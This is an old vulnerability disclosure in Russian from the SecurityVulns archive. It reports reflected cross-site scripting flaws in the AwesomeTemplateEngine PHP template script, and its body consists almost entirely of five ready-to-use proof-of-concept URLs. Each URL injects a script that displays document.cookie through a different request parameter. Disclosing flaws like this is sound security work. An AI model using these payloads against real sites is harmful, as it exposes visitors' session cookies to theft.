Cross-Site Scripting vulnerabilities in AwesomeTemplateEngine

2008-01-03T00:00:00
ID SECURITYVULNS:DOC:18784
Type securityvulns
Reporter Securityvulns
Modified 2008-01-03T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в AwesomeTemplateEngine.

XSS:

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Атака возможна при включенных register globals.

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1694/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua